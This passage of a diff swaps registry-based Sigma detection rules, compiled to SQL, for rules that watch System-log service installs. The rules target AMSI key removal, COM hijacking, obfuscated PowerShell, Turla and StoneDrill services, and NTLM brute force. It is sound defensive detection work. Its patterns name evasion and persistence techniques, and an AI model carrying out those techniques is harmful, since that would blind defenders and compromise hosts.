"experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE 
'%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", - "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by 
Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" - ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" - }, - { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "status": "test", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') 
AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ 
"attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "description": "Detects NetSupport Manager service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "status": "test", + "description": "Detect suspicious error 
on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "PUA - Sysinternal Tool Execution - Registry", - "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", - "author": "Markus Neis", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. 
Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "Detects plugged/unplugged USB devices", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" + "attack.initial_access", + "attack.t1200" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND 
EventID IN ('2003', '2100', '2102'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_usb_device_plugged.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.execution", - "attack.t1112" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Unknown" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet 
Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Legitimate administrative action" + "Legacy hosts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_susp_ntlm_auth.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": 
"frack113", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Application Uninstalled", + "id": "570ae5ec-33dc-427c-b815-db86228ad43e", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": 